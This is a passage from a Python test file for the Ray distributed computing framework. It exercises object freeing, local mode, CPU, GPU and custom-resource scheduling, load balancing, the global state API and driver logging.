return ray.worker.global_worker.node.unique_id
ActorOnNode0 = ray.remote(resources={"Custom0": 1})(RawActor)
ActorOnNode1 = ray.remote(resources={"Custom1": 1})(RawActor)
ActorOnNode2 = ray.remote(resources={"Custom2": 1})(RawActor)
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def run_one_test(actors, local_only, delete_creating_tasks):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free(
[a, b, c],
local_only=local_only,
delete_creating_tasks=delete_creating_tasks)
# Wait for the objects to be deleted.
time.sleep(0.1)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.node.unique_id
for object_id in l1:
assert ray.get(object_id) != local_return
# Case3: These cases test the deleting creating tasks for the object.
(a, b, c) = run_one_test(actors, False, False)
task_table = ray.tasks()
for obj in [a, b, c]:
assert ray._raylet.compute_task_id(obj).hex() in task_table
(a, b, c) = run_one_test(actors, False, True)
task_table = ray.tasks()
for obj in [a, b, c]:
assert ray._raylet.compute_task_id(obj).hex() not in task_table
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return ObjectIDs.
assert isinstance(xref, ray.ObjectID)
assert np.alltrue(ray.get(xref) == np.ones([3, 4, 5]))
y = np.random.normal(size=[11, 12])
# Check that ray.get(ray.put) is the identity.
assert np.alltrue(y == ray.get(ray.put(y)))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
bref = local_mode_g.remote(ray.get(aref))
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
assert np.alltrue(ray.get(bref) == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Check that ray.put() and ray.internal.free() work in local mode.
v1 = np.ones(10)
v2 = np.zeros(10)
k1 = ray.put(v1)
assert np.alltrue(v1 == ray.get(k1))
k2 = ray.put(v2)
assert np.alltrue(v2 == ray.get(k2))
ray.internal.free([k1, k2])
with pytest.raises(Exception):
ray.get(k1)
with pytest.raises(Exception):
ray.get(k2)
# Should fail silently.
ray.internal.free([k1, k2])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
@ray.method(num_return_vals=3)
def returns_multiple(self):
return 1, 2, 3
test_actor = LocalModeTestClass.remote(np.arange(10))
obj = test_actor.get_array.remote()
assert isinstance(obj, ray.ObjectID)
assert np.alltrue(ray.get(obj) == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == ray.get(test_actor.get_array.remote()))
# Check that actor handles work in local mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
# Check that exceptions are deferred until ray.get().
exception_str = "test_basic remote task exception"
@ray.remote
def throws():
raise Exception(exception_str)
obj = throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
# Check that multiple return values are handled properly.
@ray.remote(num_return_vals=3)
def returns_multiple():
return 1, 2, 3
obj1, obj2, obj3 = returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
obj1, obj2, obj3 = test_actor.returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
@ray.remote(num_return_vals=2)
def returns_multiple_throws():
raise Exception(exception_str)
obj1, obj2 = returns_multiple_throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
ray.get(obj1)
with pytest.raises(Exception, match=exception_str):
ray.get(obj2)
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 2
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 2
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
def get_gpu_ids(num_gpus_per_worker):
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == num_gpus_per_worker
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
f0 = ray.remote(num_gpus=0)(lambda: get_gpu_ids(0))
f1 = ray.remote(num_gpus=1)(lambda: get_gpu_ids(1))
f2 = ray.remote(num_gpus=2)(lambda: get_gpu_ids(2))
f4 = ray.remote(num_gpus=4)(lambda: get_gpu_ids(4))
f5 = ray.remote(num_gpus=5)(lambda: get_gpu_ids(5))
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise RayTestTimeoutException(
"Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
# There are only 10 GPUs, and each task uses 5 GPUs, so there should only
# be 2 tasks scheduled at a given time.
t1 = time.time()
ray.get([f5.remote() for _ in range(20)])
assert time.time() - t1 >= 10 * 0.1
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
# We should be able to execute a task that requires 0 CPU resources.
@ray.remote(num_cpus=0)
def f():
return 1
ray.get(f.remote())
# We should be able to create an actor that requires 0 CPU resources.
@ray.remote(num_cpus=0)
class Actor(object):
def method(self):
pass
a = Actor.remote()
x = a.method.remote()
ray.get(x)
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
node_id = ray.worker.global_worker.node.unique_id
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.node.unique_id
# Make sure tasks and actors run on the remote raylet.
a = Foo.remote()
assert ray.get(a.method.remote()) != node_id
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_raylets(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific raylets, and we will check that they are assigned
# to the correct raylets.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(address=cluster.address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and raylets (at least right now), this can be
# used to identify which raylet the task was assigned to.
# This must be run on the zeroth raylet.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the first raylet.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the second raylet.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the first or second raylet.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the zeroth or second raylet.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.node.plasma_store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.nodes()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(address=cluster.address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.node.unique_id
# The f tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
node_id = ray.worker.global_worker.node.unique_id
# The g tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != node_id
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(address=cluster.address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
# The f and g tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
node_id = ray.worker.global_worker.node.unique_id
# The h tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != node_id
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
# TODO: 5 retry attempts may be too little for Travis and we may need to
# increase it if this test begins to be flaky on Travis.
def test_zero_capacity_deletion_semantics(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"test_resource": 1})
def test():
resources = ray.available_resources()
MAX_RETRY_ATTEMPTS = 5
retry_count = 0
del resources["memory"]
del resources["object_store_memory"]
while resources and retry_count < MAX_RETRY_ATTEMPTS:
time.sleep(0.1)
resources = ray.available_resources()
retry_count += 1
if retry_count >= MAX_RETRY_ATTEMPTS:
raise RuntimeError(
"Resources were available even after five retries.")
return resources
function = ray.remote(
num_cpus=2, num_gpus=1, resources={"test_resource": 1})(test)
cluster_resources = ray.get(function.remote())
# All cluster resources should be utilized and
# cluster_resources must be empty
assert cluster_resources == {}
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(ray_start_regular):
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(ray_start_regular):
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets
# in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(address=cluster.address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.node.unique_id
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets in a
# roughly equal manner even when the tasks have dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(address=cluster.address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.node.unique_id
# This object will be local to one of the raylets. Make sure
# this doesn't prevent tasks from being scheduled on other raylets.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.tasks()) >= num_tasks:
return
time.sleep(0.1)
raise RayTestTimeoutException("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.objects()) >= num_objects:
return
time.sleep(0.1)
raise RayTestTimeoutException("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
error_message = ("The ray global state API cannot be used "
"before ray.init has been called.")
with pytest.raises(Exception, match=error_message):
ray.objects()
with pytest.raises(Exception, match=error_message):
ray.tasks()
with pytest.raises(Exception, match=error_message):
ray.nodes()
with pytest.raises(Exception, match=error_message):
ray.jobs()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
assert ray.cluster_resources()["CPU"] == 5
assert ray.cluster_resources()["GPU"] == 3
assert ray.cluster_resources()["CustomResource"] == 1
assert ray.objects() == {}
job_id = ray.utils.compute_job_id_from_driver(
ray.WorkerID(ray.worker.global_worker.worker_id))
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.tasks()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_unique_id_hex = ray.UniqueID.nil().hex()
nil_actor_id_hex = ray.ActorID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_actor_id_hex
assert task_spec["Args"] == []
assert task_spec["JobID"] == job_id.hex()
assert task_spec["FunctionID"] == nil_unique_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.nodes()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.tasks()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_actor_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["JobID"] == job_id.hex()
assert task_spec["ReturnObjectIDs"] == [result_id]
assert task_table[task_id] == ray.tasks(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.objects()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise RayTestTimeoutException(
"Timed out while waiting for object table to "
"update.")
object_table = ray.objects()
assert len(object_table) == 2
assert object_table[x_id] == ray.objects(x_id)
object_table_entry = ray.objects(result_id)
assert object_table[result_id] == object_table_entry
job_table = ray.jobs()
assert len(job_table) == 1
assert job_table[0]["JobID"] == job_id.hex()
assert job_table[0]["NodeManagerAddress"] == node_ip_address
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
# TODO(rkn): Check that no additional logs appear beyond what we expect
# and that there are no duplicate logs. Once we address the issue
# described in https://github.com/ray-project/ray/pull/5462, we should
# also check that nothing is logged to stderr.
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
# TODO(rkn): Check that no additional logs appear beyond what we expect
# and that there are no duplicate logs. Once we address the issue
# described in https://github.com/ray-project/ray/pull/5462, we should
# also check that nothing is logged to stderr.
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
def test_specific_job_id():
dummy_driver_id = ray.JobID.from_int(1)
ray.init(num_cpus=1, job_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID.from_random()
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
